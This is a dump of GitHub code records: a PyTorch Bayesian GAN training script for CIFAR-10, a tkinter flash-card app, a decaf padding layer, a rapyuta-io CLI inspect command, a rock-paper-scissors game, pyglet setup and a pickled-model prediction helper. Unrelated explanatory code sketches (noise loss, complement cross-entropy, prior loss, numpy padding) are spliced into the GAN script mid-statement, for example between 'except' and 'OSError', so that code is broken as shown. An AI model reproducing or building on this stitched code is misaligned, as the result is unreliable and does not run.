nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom statsutil import AverageMeter, accuracy\nfrom tensorboard_logger import configure, log_value\n\n# Default Parameters\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='cifar10')\nparser.add_argument('--imageSize', type=int, default=32)\nparser.add_argument('--batchSize', type=int, default=64, help='input batch size')\nparser.add_argument('--nz', type=int, default=100, help='size of the latent z vector')\nparser.add_argument('--niter', type=int, default=2, help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')\nparser.add_argument('--cuda', type=int, default=1, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--outf', default='modelfiles/pytorch_demo3', help='folder to output images and model checkpoints')\nparser.add_argument('--numz', type=int, default=1, help='The number of sets of z to marginalize over.')\nparser.add_argument('--num_mcmc', type=int, default=10, help='The number of MCMC chains to run in parallel')\nparser.add_argument('--num_semi', type=int, default=4000, help='The number of semi-supervised samples')\nparser.add_argument('--gnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--dnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--d_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--g_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--stats_interval', type=int, default=10, help='Calculate test accuracy every interval')\nparser.add_argument('--tensorboard', type=int, default=1, help='')\nparser.add_argument('--bayes', type=int, default=1, help='Do Bayesian GAN or normal GAN')\nimport sys; sys.argv=['']; del sys\nopt = parser.parse_args()\ntry:\n    os.makedirs(opt.outf)\nexcept 
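# A minimal sketch of the "noisy loss" trick described above: with
# per-parameter noise n ~ N(0, 2*alpha*eta), adding (1/eta) * sum(theta * n)
# to the loss makes plain momentum SGD perform the SGHMC update, since the
# gradient of the noise term is n/eta and the optimizer scales it by eta.
# This is illustrative standalone code, not the repository's NoiseLoss.
import math
import torch

def sghmc_noise_loss(params, alpha, eta):
    scale = math.sqrt(2.0 * alpha * eta)
    loss = 0.0
    for p in params:
        n = torch.randn_like(p) * scale    # n ~ N(0, 2*alpha*eta*I)
        loss = loss + (p * n).sum() / eta  # d/dp of this term is n/eta
    return loss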
OSError:\n print(\"Error Making Directory\", opt.outf)\n pass\nif opt.tensorboard: configure(opt.outf)\n\n# First, we construct the data loader for full training set \n# as well as the data loader of a partial training set for semi-supervised learning\n# transformation operator\nnormalize = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\ntransform_opt = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n# get training set and test set\ndataset = dset.CIFAR10(root=\"./cifar10\", download=True,\n transform=transform_opt) \ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\nfrom partial_dataset import PartialDataset\n# partial dataset for semi-supervised training\ndataset_partial = PartialDataset(dataset, opt.num_semi)\n\n\n# test set for evaluation\ndataset_test = dset.CIFAR10(root=\"./cifar10\",\n train=False,\n transform=transform_opt)\ndataloader_test = torch.utils.data.DataLoader(dataset_test,\n batch_size=opt.batchSize, shuffle=False, pin_memory=True, num_workers=0)\n\ndataloader_semi = torch.utils.data.DataLoader(dataset_partial, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\n\n# Now we initialize the distributions of G and D\n##### Generator ######\n# opt.num_mcmc is the number of MCMC chains that we run in parallel\n# opt.numz is the number of noise batches that we use. We also use different parameter samples for different batches\n# we construct opt.numz * opt.num_mcmc initial generator parameters\n# We will keep sampling parameters from the posterior starting from this set\n# Keeping track of many MCMC chains can be done quite elegantly in Pytorch\nfrom utils.BayesianCGANModels.discriminators import _BayesianLeNetD, _netD\nfrom utils.BayesianCGANModels.generators import _BayesianNetG #_netG\nfrom statsutil import weights_init\nnetGs = []\nfor _idxz in range(opt.numz):\n for _idxm in range(opt.num_mcmc):\n netG = _BayesianNetG(noize=opt.nz)\n #netG.apply(weights_init)\n netGs.append(netG)\n \n##### Discriminator ######\n# We will use 1 chain of MCMCs for the discriminator\n# The number of classes for semi-supervised case is 11; that is,\n# index 0 for fake data and 1-10 for the 10 classes of CIFAR.\nnum_classes = 11\nnetD = _netD(opt.ngpu, num_classes=num_classes)\n#netD = _BayesianLeNetD(1,3)\n\n# In order to calculate errG or errD_real, we need to sum the probabilities over all the classes (1 to K)\n# ComplementCrossEntropyLoss is a loss function that performs this task\n# We can specify a default except_index that corresponds to a fake label. 
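# A hedged sketch of what the complement cross-entropy described above
# computes: minimize -log(sum of class probabilities excluding except_index),
# i.e. -log(1 - p[except_index]). Illustrative code, not the repository's
# ComplementCrossEntropyLoss implementation.
import torch
import torch.nn.functional as F

def complement_cross_entropy(logits, except_index=0):
    log_probs = F.log_softmax(logits, dim=1)
    keep = [j for j in range(logits.size(1)) if j != except_index]
    # log(1 - p[except_index]) computed stably as logsumexp over other classes
    other = torch.logsumexp(log_probs[:, keep], dim=1)
    return -other.mean()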
In this case, we use index=0\nfrom ComplementCrossEntropyLoss import ComplementCrossEntropyLoss\ncriterion = nn.CrossEntropyLoss()\n# use the default index = 0 - equivalent to summing all other probabilities\ncriterion_comp = ComplementCrossEntropyLoss(except_index=0)\n\n\nfrom utils.BayesianCGANModels.distributions import Normal\nfrom utils.BayesianCGANModels.bayes import NoiseLoss, PriorLoss\n# Finally, initialize the ``optimizers''\n# Since we keep track of a set of parameters, we also need a set of\n# ``optimizers''\nif opt.d_optim == 'adam':\n optimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelif opt.d_optim == 'sgd':\n optimizerD = torch.optim.SGD(netD.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\noptimizerGs = []\nfor netG in netGs:\n optimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(0.5, 0.999))\n optimizerGs.append(optimizerG)\n\n# since the log posterior is the average per sample, we also scale down the prior and the noise\ngprior_criterion = PriorLoss(prior_std=1., observed=1000.)\ngnoise_criterion = NoiseLoss(params=netGs[0].parameters(), scale=math.sqrt(2*opt.gnoise_alpha/opt.lr), observed=1000.)\ndprior_criterion = PriorLoss(prior_std=1., observed=50000.)\ndnoise_criterion = NoiseLoss(params=netD.parameters(), scale=math.sqrt(2*opt.dnoise_alpha*opt.lr), observed=50000.)\n\n\n# Fixed noise for data generation\nfixed_noise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1).normal_(0, 1).cuda()\nfixed_noise = Variable(fixed_noise)\n\n# initialize input variables and use CUDA (optional)\ninput = torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)\nnoise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1)\nlabel = torch.FloatTensor(opt.batchSize)\nreal_label = 1\nfake_label = 0\n\nif opt.cuda:\n netD.cuda()\n for netG in netGs:\n netG.cuda()\n criterion.cuda()\n criterion_comp.cuda()\n input, label = input.cuda(), label.cuda()\n noise = noise.cuda()\n\n\n# fully supervised\n#netD_fullsup = _BayesianLeNetD(1,3)\nnetD_fullsup = _netD(opt.ngpu, num_classes=num_classes)\nnetD_fullsup.apply(weights_init) #was not commented out\ncriterion_fullsup = nn.CrossEntropyLoss()\nif opt.d_optim == 'adam':\n optimizerD_fullsup = optim.Adam(netD_fullsup.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelse:\n optimizerD_fullsup = optim.SGD(netD_fullsup.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\nif opt.cuda:\n netD_fullsup.cuda()\n criterion_fullsup.cuda()\n\n\n# We define a class to calculate the accuracy on test set\n# to test the performance of semi-supervised training\ndef get_test_accuracy(model_d, iteration, label='semi'):\n # don't forget to do model_d.eval() before doing evaluation\n top1 = AverageMeter()\n for i, (input, target) in enumerate(dataloader_test):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input.cuda(), volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n output = model_d(input_var)\n\n probs = output.data[:, 1:] # discard the zeroth index\n prec1 = accuracy(probs, target, topk=(1,))[0]\n #top1.update(prec1[0], input.size(0))\n top1.update(prec1, input.size(0))\n if i % 50 == 0:\n print(\"{} Test: [{}/{}]\\t Prec@1 {top1.val:.3f} ({top1.avg:.3f})\".format(label, i, len(dataloader_test), top1=top1))\n print('{label} Test Prec@1 {top1.avg:.2f}'.format(label=label, top1=top1))\n log_value('test_acc_{}'.format(label), top1.avg, iteration)\n\n\niteration = 0\nfor epoch in range(opt.niter):\n top1 = 
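# A minimal sketch of a dataset-size-scaled Gaussian prior term, matching the
# observed= convention used above: because the data loss is averaged per
# sample, the prior's negative log density is divided by the number of
# observations. Illustrative code, not the repository's PriorLoss.
import torch

def gaussian_prior_loss(params, prior_std=1.0, observed=50000.0):
    loss = 0.0
    for p in params:
        # -log N(p; 0, prior_std^2) up to an additive constant
        loss = loss + (p ** 2).sum() / (2.0 * prior_std ** 2)
    return loss / observed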
AverageMeter()\n top1_weakD = AverageMeter()\n for i, data in enumerate(dataloader):\n iteration += 1\n #######\n # 1. real input\n netD.zero_grad()\n _input, _ = data\n batch_size = _input.size(0)\n if opt.cuda:\n _input = _input.cuda()\n input.resize_as_(_input).copy_(_input) \n label.resize_(batch_size).fill_(real_label) \n inputv = Variable(input)\n labelv = Variable(label)\n \n output = netD(inputv)#used to have no [0] index\n print(output.shape)\n errD_real = criterion_comp(output)\n errD_real.backward()\n # calculate D_x, the probability that real data are classified \n D_x = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 2. Generated input\n fakes = []\n for _idxz in range(opt.numz):\n noise.resize_(batch_size, opt.nz, 1, 1).normal_(0, 1)\n noisev = Variable(noise)\n for _idxm in range(opt.num_mcmc):\n idx = _idxz*opt.num_mcmc + _idxm\n netG = netGs[idx]\n _fake = netG(noisev)[0]\n fakes.append(_fake)\n fake = torch.cat(fakes)\n output = netD(fake.detach())#used to have no [0] index\n labelv = Variable(torch.LongTensor(fake.data.shape[0]).cuda().fill_(fake_label))\n errD_fake = criterion(output, labelv)\n errD_fake.backward()\n \n D_G_z1 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 3. Labeled Data Part (for semi-supervised learning)\n for ii, (input_sup, target_sup) in enumerate(dataloader_semi):\n input_sup, target_sup = input_sup.cuda(), target_sup.cuda()\n break\n input_sup_v = Variable(input_sup.cuda())\n # convert target indicies from 0 to 9 to 1 to 10\n target_sup_v = Variable( (target_sup + 1).cuda())\n output_sup = netD(input_sup_v) #used to have no [0] index\n err_sup = criterion(output_sup, target_sup_v)\n err_sup.backward()\n prec1 = accuracy(output_sup.data, target_sup + 1, topk=(1,))[0]\n #top1.update(prec1[0], input_sup.size(0))\n top1.update(prec1,input_sup.size(0))\n if opt.bayes:\n errD_prior = dprior_criterion(netD.parameters())\n errD_prior.backward()\n errD_noise = dnoise_criterion(netD.parameters())\n errD_noise.backward()\n errD = errD_real + errD_fake + err_sup + errD_prior + errD_noise\n else:\n errD = errD_real + errD_fake + err_sup\n optimizerD.step()\n \n # 4. Generator\n for netG in netGs:\n netG.zero_grad()\n labelv = Variable(torch.FloatTensor(fake.data.shape[0]).cuda().fill_(real_label))\n output = netD(fake)\n errG = criterion_comp(output)\n if opt.bayes:\n for netG in netGs:\n errG += gprior_criterion(netG.parameters())\n errG += gnoise_criterion(netG.parameters())\n errG.backward()\n D_G_z2 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n for optimizerG in optimizerGs:\n optimizerG.step()\n \n # 5. Fully supervised training (running in parallel for comparison)\n netD_fullsup.zero_grad()\n input_fullsup = Variable(input_sup)\n target_fullsup = Variable((target_sup + 1))\n output_fullsup = netD_fullsup(input_fullsup)#used to have no [0] index\n err_fullsup = criterion_fullsup(output_fullsup, target_fullsup)\n optimizerD_fullsup.zero_grad()\n err_fullsup.backward()\n optimizerD_fullsup.step()\n \n # 6. get test accuracy after every interval\n if iteration % opt.stats_interval == 0:\n # get test accuracy on train and test\n netD.eval()\n get_test_accuracy(netD, iteration, label='semi')\n get_test_accuracy(netD_fullsup, iteration, label='sup')\n netD.train()\n \n # 7. 
Report for this iteration\n cur_val, ave_val = top1.val, top1.avg\n log_value('train_acc', top1.avg, iteration)\n #print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f' % (epoch, opt.niter, i, len(dataloader),errD.data[0], errG.data[0], D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f'\n % (epoch, opt.niter, i, len(dataloader),\n errD.data, errG.data, D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n # after each epoch, save images\n vutils.save_image(_input,\n '%s/real_samples.png' % opt.outf,\n normalize=True)\n for _zid in range(opt.numz):\n for _mid in range(opt.num_mcmc):\n idx = _zid*opt.num_mcmc + _mid\n netG = netGs[idx]\n fake = netG(fixed_noise)[0]\n vutils.save_image(fake.data,\n '%s/fake_samples_epoch_%03d_G_z%02d_m%02d.png' % (opt.outf, epoch, _zid, _mid),\n normalize=True)\n for ii, netG in enumerate(netGs):\n torch.save(netG.state_dict(), '%s/netG%d_epoch_%d.pth' % (opt.outf, ii, epoch))\n torch.save(netD.state_dict(), '%s/netD_epoch_%d.pth' % (opt.outf, epoch))\n torch.save(netD_fullsup.state_dict(), '%s/netD_fullsup_epoch_%d.pth' % (opt.outf, epoch))\n\n\n#from tensorflow.python.summary import event_accumulator\nfrom tensorboard.backend.event_processing import event_accumulator\nimport pandas as pd\nfrom plotnine import *\nea = event_accumulator.EventAccumulator(opt.outf)\nea.Reload()\n\n_df1 = pd.DataFrame(ea.Scalars('test_acc_semi'))\n_df2 = pd.DataFrame(ea.Scalars('test_acc_sup'))\ndf = pd.DataFrame()\ndf['Iteration'] = pd.concat([_df1['step'], _df2['step']])\ndf['Accuracy'] = pd.concat([_df1['value'], _df2['value']])\ndf['Classification'] = ['BayesGAN']*len(_df1['step']) + ['Baseline']*len(_df2['step'])\n\n\n# The results show that the Bayesian discriminator trained with the Bayesian generator outperforms the discriminator trained on partial data.\n\n\np = ggplot(df, aes(x='Iteration', y='Accuracy', color='Classification', label='Classification')) + geom_point(size=0.5)\nprint(p)\n","repo_name":"gumin2020/MyDissertation","sub_path":"Convolutional_BayesianGAN/Bayesian GAN in PyTorch.py","file_name":"Bayesian GAN in PyTorch.py","file_ext":"py","file_size_in_byte":16531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35776645612","text":"from tkinter import *\nimport pandas as pd\nfrom random import choice\n\nBACKGROUND_COLOR = \"#B1DDC6\"\ncurrent_word = {}\ndata_dict = {}\n\ntry:\n data = pd.read_csv('Files/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pd.read_csv('Files/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\ndef change_word():\n global current_word, flip_timer\n window.after_cancel(flip_timer)\n current_word = choice(data_dict)\n canvas.itemconfig(lang, text=\"French\", fill=\"black\")\n canvas.itemconfig(word, text=f\"{current_word['French']}\", fill=\"black\")\n canvas.itemconfig(canvas_image, image=card_front_image)\n flip_timer = window.after(3000, func=flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(lang, text=\"English\", fill=\"white\")\n canvas.itemconfig(word, text=f\"{current_word['English']}\", fill=\"white\")\n canvas.itemconfig(canvas_image, image=card_back_image)\n\n\ndef known_words():\n data_dict.remove(current_word)\n new_data = pd.DataFrame(data_dict)\n new_data.to_csv(\"Files/words_to_learn.csv\", index=False)\n\n change_word()\n\n\nwindow = 
Tk()\nwindow.title(\"Flash Card App\")\nwindow.config(padx=50, pady=50, bg=BACKGROUND_COLOR)\n\nwindow.tk.call('source', 'Files/azure.tcl')\nwindow.tk.call('set_theme', 'light')\n\nflip_timer = window.after(3000, func=flip_card)\n\ncanvas = Canvas(width=800, height=530, highlightthickness=0, bg=BACKGROUND_COLOR)\ncard_front_image = PhotoImage(file='Files/card_front.png')\ncard_back_image = PhotoImage(file='Files/card_back.png')\nright_image = PhotoImage(file='Files/right.png')\nwrong_image = PhotoImage(file='Files/wrong.png')\ncanvas_image = canvas.create_image(400, 263, image=card_front_image)\nlang = canvas.create_text(400, 200, text=\"\", font=(\"Poppins\", 25))\nword = canvas.create_text(400, 300, text=\"\", font=(\"Poppins\", 76, \"bold\"))\ncanvas.grid(row=1, column=1, columnspan=3)\n\nright_btn = Button(image=right_image, border=0, bg=BACKGROUND_COLOR, cursor='hand2',\n                   command=known_words, activebackground=BACKGROUND_COLOR)\nright_btn.grid(row=2, column=3)\n\nwrong_btn = Button(image=wrong_image, bg=BACKGROUND_COLOR, border=0, cursor='hand2',\n                   command=change_word, activebackground=BACKGROUND_COLOR)\nwrong_btn.grid(row=2, column=1)\n\nchange_word()\n\nwindow.mainloop()\n","repo_name":"Maliksidk19/100DaysOfPython","sub_path":"Day31_flashCardApp.py","file_name":"Day31_flashCardApp.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25103747720","text":"\"\"\"Implements the padding layer.\"\"\"\nimport typing\n\nfrom decaf.base import Layer, Blob\n\n\nclass PaddingLayer(Layer):\n    \"\"\"A Layer that pads a matrix.\"\"\"\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Initializes a padding layer.\n        kwargs:\n            'pad': the number of pixels to pad; should be non-negative. If pad is 0, the layer will simply mirror the\n            input.\n            'value': the value inserted into the padded area. 
Default 0.\n \"\"\"\n Layer.__init__(self, **kwargs)\n self._pad: int = self.spec['pad']\n self._value: float = self.spec.get('value', 0)\n if self._pad < 0:\n raise ValueError('Padding should be non-negative.')\n\n def forward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob]):\n \"\"\"Computes the forward pass.\"\"\"\n if self._pad == 0:\n top[0].mirror(bottom[0].data())\n return\n features = bottom[0].data()\n pad = self._pad\n new_shape = (features.shape[0],\n features.shape[1] + pad * 2,\n features.shape[2] + pad * 2) + features.shape[3:]\n output = top[0].init_data(new_shape, features.dtype)\n output[:] = self._value\n output[:, pad:-pad, pad:-pad] = features\n\n def backward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob],\n propagate_down: bool):\n \"\"\"Computes the backward pass.\"\"\"\n if not propagate_down:\n return 0.\n if self._pad == 0:\n bottom[0].mirror_diff(top[0].diff())\n else:\n pad = self._pad\n top_diff = top[0].diff()\n bottom_diff = bottom[0].init_diff()\n bottom_diff[:] = top_diff[:, pad:-pad, pad:-pad]\n return 0.\n\n def update(self):\n \"\"\"Padding has nothing to update.\"\"\"\n pass\n","repo_name":"xinpingwang/decaf","sub_path":"decaf/layers/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"526280271","text":"import click\nfrom rapyuta_io import Build\n\nfrom riocli.build.util import name_to_guid\nfrom riocli.config import new_client\nfrom riocli.utils import inspect_with_format\n\n\n@click.command('inspect')\n@click.option('--format', '-f', 'format_type', default='yaml',\n type=click.Choice(['json', 'yaml'], case_sensitive=False))\n@click.argument('build-name', required=True)\n@name_to_guid\ndef inspect_build(format_type: str, build_guid: str, build_name: str) -> None:\n \"\"\"\n Inspect the build resource\n \"\"\"\n try:\n client = new_client()\n build = client.get_build(build_guid, include_build_requests=True)\n data = make_build_inspectable(build)\n inspect_with_format(data, format_type)\n except Exception as e:\n click.secho(str(e), fg='red')\n raise SystemExit(1)\n\n\ndef make_build_inspectable(build: Build) -> dict:\n build_requests = make_build_requests_inspectable(build)\n build_info = make_build_info_inspectable(build)\n return {\n 'created_at': build.CreatedAt,\n 'updated_at': build.UpdatedAt,\n 'deleted_at': build.DeletedAt,\n 'guid': build.guid,\n 'build_generation': build.buildGeneration,\n 'build_name': build.buildName,\n 'build_info': build_info,\n 'status': build.status,\n 'owner_project': build.ownerProject,\n 'creator': build.creator,\n 'docker_pull_info': build.dockerPullInfo,\n 'build_requests': build_requests,\n 'secret': build.secret,\n 'docker_pull_secret': build.dockerPullSecret,\n 'docker_push_secret': build.dockerPushSecret,\n 'docker_push_repository': build.dockerPushRepository,\n }\n\n\ndef make_build_info_inspectable(build: Build) -> dict:\n build_info = build.buildInfo\n return {\n 'repository': build_info.repository,\n 'strategy_type': build_info.strategyType,\n 'architecture': build_info.architecture,\n 'is_ros': build_info.isRos,\n 'ros_distro': build_info.rosDistro,\n 'simulation_options': {\n 'simulation': build_info.simulationOptions.simulation\n },\n 'build_options': build_info.buildOptions,\n 'branch': build_info.branch,\n 'docker_file_path': build_info.dockerFilePath,\n 'context_dir': build_info.contextDir,\n }\n\n\ndef make_build_requests_inspectable(build: 
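# The forward/backward pair above amounts to a constant pad of the two
# spatial axes and a crop of the incoming gradient; a small numpy sketch of
# the same idea (illustrative, outside the decaf Blob API):
import numpy as np

def pad_forward(x, pad, value=0.0):
    # x has shape (num, height, width, channels); pad only height and width
    return np.pad(x, ((0, 0), (pad, pad), (pad, pad), (0, 0)),
                  mode='constant', constant_values=value)

def pad_backward(top_diff, pad):
    # the gradient of a pad is a crop: padded border cells get no gradient
    return top_diff[:, pad:-pad, pad:-pad, :]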
Build) -> list:\n build_request_data = []\n for build_request in build.buildRequests:\n build_request_data.append({\n 'created_at': build_request['CreatedAt'],\n 'updated_at': build_request['UpdatedAt'],\n 'deleted_at': build_request['DeletedAt'],\n 'request_id': build_request['requestId'],\n 'is_complete': build_request['isComplete'],\n 'error_string': build_request['errorString'],\n 'owner_project': build_request['ownerProject'],\n 'creator': build_request['creator'],\n 'trigger_name': build_request['triggerName'],\n 'build_generation': build_request['buildGeneration'],\n 'git_metadata': make_git_metadata_inspectable(build_request['gitMetadata']),\n 'executable_image_info': make_executable_image_info_inspectable(build_request['executableImageInfo']),\n })\n return build_request_data\n\n\ndef make_git_metadata_inspectable(git_metadata: dict) -> dict:\n guid = list(git_metadata.keys())[0]\n guid_details = git_metadata[guid]\n guid_value = {\n 'author': {\n 'email': guid_details['author']['email'],\n 'name': guid_details['author']['name'],\n },\n 'branch': guid_details['branch'],\n 'commit': guid_details['commit'],\n 'committer': {\n 'email': guid_details['committer']['email'],\n 'name': guid_details['committer']['name'],\n },\n 'message': guid_details['message'],\n 'repository_url': guid_details['repositoryUrl']\n }\n return {\n guid: guid_value\n }\n\n\ndef make_executable_image_info_inspectable(exec_img_info: dict) -> dict:\n image_info_list = []\n for img_info in exec_img_info['imageInfo']:\n image_info_list.append({\n 'artifact_id': img_info['artifactID'],\n 'image_name': img_info['imageName'],\n })\n return {\n 'image_info': image_info_list\n }\n","repo_name":"rapyuta-robotics/rapyuta-io-cli","sub_path":"riocli/build/inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36349618389","text":"import random\nimport tkinter as tk\nfrom tkinter import ttk # themed widgets\n\nWIDTH, HEIGHT = 490, 300\nBUTTON_WIDTH, BUTTON_HEIGHT = 22, 6\n\nroot = tk.Tk()\nroot.resizable(False, False)\nroot.geometry(f'{WIDTH}x{HEIGHT}')\nroot.title('rock_paper_scissors')\n\n\ndef play(choice):\n opponent = random.choice(['rock', 'paper', 'scissors'])\n opponentChoice['text'] = f'{opponent}'\n yourChoice['text'] = f'{choice}'\n if ((choice == 'rock' and opponent == 'scissors') or\n (choice == 'paper' and opponent == 'rock') or\n (choice == 'scissors' and opponent == 'paper')):\n winning['text'] = \"You Won\"\n\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{int(t_splitted[0])+1}/{t_splitted[1]}/{t_splitted[2]}'\n elif choice == opponent:\n winning['text'] = \"Draw\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{t_splitted[1]}/{int(t_splitted[2])+1}'\n else:\n winning['text'] = \"You Lost\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{int(t_splitted[1])+1}/{t_splitted[2]}'\n\n\nframeUpper = tk.Frame(root)\n\nrock = tk.Button(frameUpper, text=\"rock\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('rock'))\nrock.grid(row=1, column=0)\n\npaper = tk.Button(frameUpper, text=\"paper\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('paper'))\npaper.grid(row=1, column=1)\n\nscissors = tk.Button(frameUpper, text=\"scissors\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT,\n command=lambda: 
play('scissors'))\nscissors.grid(row=1, column=2)\n\n\nwinning = ttk.Label(root, text=\"Press button to play...\", font='Times 20 bold')\nwinning.grid(row=2)\n\nyourChoiceLabel = ttk.Label(root, text=\"Your Choice:\", font='Times 18')\nyourChoiceLabel.grid(row=3, column=0, sticky=tk.W)\n\nyourChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nyourChoice.grid(row=3, column=0)\n\nopponentChoiceLabel = ttk.Label(root, text=\"Opponent Choice:\", font='Times 18')\nopponentChoiceLabel.grid(row=4, column=0, sticky=tk.W)\n\nopponentChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nopponentChoice.grid(row=4, column=0)\n\nstatistics = ttk.Label(root, text=\"Statistics(W,L,D):\", font='Times 16')\nstatistics.grid(row=5, column=0, sticky=tk.W)\n\nstatisticsValue = ttk.Label(root, text=\"0/0/0\", font='Times 18')\nstatisticsValue.grid(row=5, column=0)\n\nframeUpper.grid(row=1)\nroot.mainloop()\n","repo_name":"noxikoxi/zadaniaPython","sub_path":"zestaw10/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26549706284","text":"\nfrom pyglet.gl import *\nfrom pyglet.window import mouse\nfrom src.window import Window\nfrom src.cube import *\nfrom config import *\n\ndef setup():\n\n    # Set the color of \"clear\", i.e. the sky, in rgba.\n    glClearColor(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3])\n\n    # Enable culling (not rendering) of back-facing facets -- facets that aren't\n    # visible to you.\n    # glEnable( GL_CULL_FACE )\n    # Set the texture minification/magnification function to GL_NEAREST (nearest\n    # in Manhattan distance) to the specified texture coordinates. GL_NEAREST\n    # \"is generally faster than GL_LINEAR, but it can produce textured images\n    # with sharper edges because the transition between texture elements is not\n    # as smooth.\"\n    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n\n    glEnable(GL_FOG)\n    # Set the fog color.\n    glFogfv(GL_FOG_COLOR, (GLfloat * 4)(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3]))\n    # Say we have no preference between rendering speed and quality.\n    glHint(GL_FOG_HINT, GL_DONT_CARE)\n    # Specify the equation used to compute the blending factor.\n    glFogi(GL_FOG_MODE, GL_LINEAR)\n    # How close and far away fog starts and ends. 
The closer the start and end,\n    # the denser the fog in the fog range.\n    glFogf(GL_FOG_START, 20.0)\n    glFogf(GL_FOG_END, 60.0)\n\n\ndef main():\n    window = Window( width=800, height=600, caption='Pyglet', resizable=True )\n    # Hide the mouse cursor and prevent the mouse from leaving the window.\n    window.set_exclusive_mouse(True)\n    setup()\n    pyglet.app.run()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"y-vas/game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"28627809120","text":"# |MODULES|--------------------------------------------------------------------\nimport sys\nimport os.path\nMODULE_PATH = os.path.dirname(__file__)\nimport pandas as pd\nimport pickle as pk\n\n\ndef assess(x):\n    clf = pk.load(open(os.path.join(MODULE_PATH,'finalized_model.sav'), 'rb'))\n    mean = pk.load(open(os.path.join(MODULE_PATH,'mean.sav'), 'rb'))\n    var = pk.load(open(os.path.join(MODULE_PATH,'var.sav'), 'rb'))\n    x = (x - mean)/var\n    x = x.to_numpy().reshape(1, -1)\n    return clf.predict(x)[0]\n\n\nif __name__ == \"__main__\":\n    test = pd.read_csv('trainlist.csv')\n    y = test.loc[:, \"Class\"].to_numpy()\n    test = test.iloc[:, 1:-2]\n    for i in range(test.shape[0]):\n        #for j, val in enumerate(test.iloc[i].to_list()):\n        #    print(\"{}\\t{}\\n\".format(j, val))\n        print(assess(test.iloc[i]))\n\n    # clf = pk.load(open('finalized_model.sav', 'rb'))\n    # mean = pk.load(open('mean.sav', 'rb'))\n    # print(mean)\n    # var = pk.load(open('var.sav', 'rb'))\n    # print(var)\n    # test = (test - mean)/var\n    # test = test.to_numpy()\n\n    # predict = clf.score(test, y)\n    # print(predict)\n\n\n    #print(assess(sample.reshape(1, -1)))\n    #train = pd.read_csv('testlist.csv')\n    #mean = train.iloc[:, 1:-2].mean(axis=0).to_list()\n    #var = train.iloc[:, 1:-2].std(axis=0).to_list()\n    